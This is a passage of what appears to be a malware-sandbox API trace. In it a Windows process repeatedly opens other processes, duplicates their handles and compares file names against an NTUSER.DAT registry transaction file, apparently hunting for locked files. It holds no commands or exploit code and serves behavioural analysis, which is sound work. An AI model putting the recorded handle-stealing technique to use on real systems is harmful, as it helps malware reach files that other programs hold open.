hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.244] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.245] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.245] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.245] CloseHandle (hObject=0x670) returned 1 [0155.245] _wcsicmp (_Str1="\\Windows Mail", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.245] CloseHandle (hObject=0x680) returned 1 [0155.245] CloseHandle (hObject=0x62c) returned 1 [0155.245] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9a4) returned 0x62c [0155.245] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.245] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.246] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.247] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.247] CloseHandle (hObject=0x670) returned 1 [0155.247] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.247] CloseHandle (hObject=0x680) returned 1 [0155.247] CloseHandle (hObject=0x62c) returned 1 [0155.247] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9a4) returned 0x62c [0155.247] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.247] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.248] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.248] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.249] CloseHandle (hObject=0x670) returned 1 [0155.249] _wcsicmp (_Str1="\\Windows Sidebar", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.249] CloseHandle (hObject=0x680) returned 1 [0155.249] CloseHandle (hObject=0x62c) returned 1 [0155.249] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9a4) returned 0x62c [0155.249] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.249] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.249] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.250] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.250] CloseHandle (hObject=0x670) returned 1 [0155.250] _wcsicmp (_Str1="\\StaticCache.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0155.250] CloseHandle (hObject=0x680) returned 1 [0155.251] CloseHandle (hObject=0x62c) returned 1 [0155.251] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9b4) returned 0x62c [0155.251] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.251] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.251] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.254] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.254] CloseHandle (hObject=0x670) returned 1 [0155.254] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.254] CloseHandle (hObject=0x680) returned 1 [0155.254] CloseHandle (hObject=0x62c) returned 1 [0155.254] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9b4) returned 0x62c [0155.254] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.254] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.255] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.255] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.255] CloseHandle (hObject=0x670) returned 1 [0155.255] _wcsicmp (_Str1="\\Microsoft Office", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0155.255] CloseHandle (hObject=0x680) returned 1 [0155.255] CloseHandle (hObject=0x62c) returned 1 [0155.256] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9b4) returned 0x62c [0155.256] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.256] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.256] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.258] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.258] CloseHandle (hObject=0x670) returned 1 [0155.258] _wcsicmp (_Str1="\\StaticCache.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0155.258] CloseHandle (hObject=0x680) returned 1 [0155.258] CloseHandle (hObject=0x62c) returned 1 [0155.258] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9e8) returned 0x62c [0155.259] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.259] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.259] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.260] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.260] CloseHandle (hObject=0x670) returned 1 [0155.260] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0155.260] CloseHandle (hObject=0x680) returned 1 [0155.260] CloseHandle (hObject=0x62c) returned 1 [0155.260] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9e8) returned 0x62c [0155.260] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.260] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.261] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.261] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.261] CloseHandle (hObject=0x670) returned 1 [0155.262] CloseHandle (hObject=0x680) returned 1 [0155.262] CloseHandle (hObject=0x62c) returned 1 [0155.262] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9e8) returned 0x62c [0155.262] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.262] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.263] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.263] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.263] CloseHandle (hObject=0x670) returned 1 [0155.263] CloseHandle (hObject=0x680) returned 1 [0155.263] CloseHandle (hObject=0x62c) returned 1 [0155.263] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9e8) returned 0x62c [0155.263] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.263] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.264] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.265] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.265] CloseHandle (hObject=0x670) returned 1 [0155.265] CloseHandle (hObject=0x680) returned 1 [0155.265] CloseHandle (hObject=0x62c) returned 1 [0155.265] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa1c) returned 0x62c [0155.265] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.265] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.266] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.266] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.266] CloseHandle (hObject=0x670) returned 1 [0155.266] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0155.266] CloseHandle (hObject=0x680) returned 1 [0155.266] CloseHandle (hObject=0x62c) returned 1 [0155.267] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa1c) returned 0x62c [0155.267] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.267] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.267] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.268] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.268] CloseHandle (hObject=0x670) returned 1 [0155.268] CloseHandle (hObject=0x680) returned 1 [0155.268] CloseHandle (hObject=0x62c) returned 1 [0155.268] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa1c) returned 0x62c [0155.268] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.268] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.269] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.271] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.271] CloseHandle (hObject=0x670) returned 1 [0155.271] CloseHandle (hObject=0x680) returned 1 [0155.271] CloseHandle (hObject=0x62c) returned 1 [0155.271] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0155.271] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.271] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.272] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.272] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.272] CloseHandle (hObject=0x670) returned 1 [0155.273] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0155.273] CloseHandle (hObject=0x680) returned 1 [0155.273] CloseHandle (hObject=0x62c) returned 1 [0155.273] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0155.273] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.273] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.274] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.274] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.274] CloseHandle (hObject=0x670) returned 1 [0155.274] CloseHandle (hObject=0x680) returned 1 [0155.274] CloseHandle (hObject=0x62c) returned 1 [0155.274] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0155.274] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x11c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.274] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.275] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.277] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.277] CloseHandle (hObject=0x670) returned 1 [0155.277] _wcsicmp (_Str1="\\RacMetaData.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 4 [0155.277] CloseHandle (hObject=0x680) returned 1 [0155.277] CloseHandle (hObject=0x62c) returned 1 [0155.277] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0155.277] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x130, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.277] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.278] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.278] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.279] CloseHandle (hObject=0x670) returned 1 [0155.279] _wcsicmp (_Str1="\\RacDatabase.sdf", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 4 [0155.279] CloseHandle (hObject=0x680) returned 1 [0155.279] CloseHandle (hObject=0x62c) returned 1 [0155.279] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0155.279] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x160, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.279] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.280] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.280] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.280] CloseHandle (hObject=0x670) returned 1 [0155.280] _wcsicmp (_Str1="\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0155.280] CloseHandle (hObject=0x680) returned 1 [0155.280] CloseHandle (hObject=0x62c) returned 1 [0155.280] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0155.280] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.280] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.281] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.282] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.282] CloseHandle (hObject=0x670) returned 1 [0155.282] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -3 [0155.282] CloseHandle (hObject=0x680) returned 1 [0155.282] CloseHandle (hObject=0x62c) returned 1 [0155.282] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0155.282] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.282] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.283] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.284] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.284] CloseHandle (hObject=0x670) returned 1 [0155.284] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0155.284] CloseHandle (hObject=0x680) returned 1 [0155.284] CloseHandle (hObject=0x62c) returned 1 [0155.284] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0155.284] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.284] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.285] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.285] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.285] CloseHandle (hObject=0x670) returned 1 [0155.285] _wcsicmp (_Str1="\\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0155.285] CloseHandle (hObject=0x680) returned 1 [0155.285] CloseHandle (hObject=0x62c) returned 1 [0155.286] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0155.286] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2e4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.286] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.286] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.288] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.288] CloseHandle (hObject=0x670) returned 1 [0155.288] _wcsicmp (_Str1="\\WinSATAPI.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.288] CloseHandle (hObject=0x680) returned 1 [0155.289] CloseHandle (hObject=0x62c) returned 1 [0155.289] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0155.289] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x334, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.289] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.289] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.290] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.290] CloseHandle (hObject=0x670) returned 1 [0155.290] _wcsicmp (_Str1="\\RacWmiDatabase.sdf", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 4 [0155.290] CloseHandle (hObject=0x680) returned 1 [0155.290] CloseHandle (hObject=0x62c) returned 1 [0155.290] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0155.290] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x34c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.290] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.291] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.291] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.291] CloseHandle (hObject=0x670) returned 1 [0155.292] _wcsicmp (_Str1="\\sqlB846.tmp", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0155.292] CloseHandle (hObject=0x680) returned 1 [0155.292] CloseHandle (hObject=0x62c) returned 1 [0155.292] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0155.292] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x370, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.292] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.292] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.293] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.293] CloseHandle (hObject=0x670) returned 1 [0155.293] _wcsicmp (_Str1="\\sqlB857.tmp", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 